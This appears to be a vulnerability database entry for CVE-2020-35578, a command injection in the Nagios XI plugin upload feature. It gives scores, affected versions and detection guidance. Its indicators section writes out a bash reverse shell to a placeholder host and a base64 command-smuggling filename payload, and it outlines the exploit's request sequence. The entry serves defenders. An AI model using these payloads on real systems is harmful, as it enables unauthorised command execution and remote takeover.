cbcvebase.
CVE-2020-35578
published 2021-01-13

CVE-2020-35578: An issue was discovered in the Manage Plugins page in Nagios XI before 5.8.0. Because the line-ending conversion feature is mishandled during a plugin upload…

PriorityP267high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
EXPLOIT
EPSS
81.92%
99.6th percentile
An issue was discovered in the Manage Plugins page in Nagios XI before 5.8.0. Because the line-ending conversion feature is mishandled during a plugin upload, a remote, authenticated admin user can execute operating-system commands.

Affected

1 ranges
VendorProductVersion rangeFixed in
nagiosnagios_xi< 5.8.05.8.0

Detection & IOCsextracted from sources · hover to see the quote

url/nagiosxi/admin/monitoringplugins.php
url/nagiosxi/login.php
commandbash -i >& /dev/tcp/<ip>/<port> 0>&1
command;echo <base64> | base64 -d | bash;#
path/nagiosxi/admin/monitoringplugins.php
  • Monitor POST requests to /nagiosxi/admin/monitoringplugins.php where the uploaded filename field (uploadedfile) contains shell metacharacters such as semicolons, pipe characters, or base64-encoded payloads rather than a legitimate plugin filename.
  • The exploit abuses the 'convert_to_unix' parameter (set to '1') in the plugin upload form to trigger line-ending conversion, which is the mishandled feature enabling command injection. Presence of this parameter alongside a suspicious filename is a strong indicator.
  • The injected filename payload follows the pattern: ;echo <base64_string> | base64 -d | bash;# — detect this pattern in multipart form-data filename fields on the monitoringplugins.php endpoint.
  • Successful exploitation results in command execution as the 'apache' user. Alert on unexpected outbound TCP connections (e.g., bash reverse shells) originating from the apache/www-data process on Nagios XI hosts.
  • The exploit first GETs /nagiosxi/admin/monitoringplugins.php to harvest a CSRF nsp token, then immediately POSTs the malicious upload. A GET immediately followed by a POST to this endpoint from the same session is a behavioral indicator.
  • ·Exploitation requires valid Nagios XI admin credentials — this is an authenticated vulnerability. Detections should be scoped to authenticated sessions targeting the admin plugin upload endpoint.
  • ·The vulnerability affects Nagios XI versions prior to 5.8.0. The Metasploit module was confirmed tested against versions 5.3.0 and 5.7.5 on CentOS 7; detections should prioritize unpatched instances below 5.8.0.
  • ·The root cause is mishandling of the line-ending conversion feature during plugin upload, not a generic file upload flaw. The 'convert_to_unix' parameter must be present and set to '1' for the injection path to be triggered.

CVSS provenance

nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.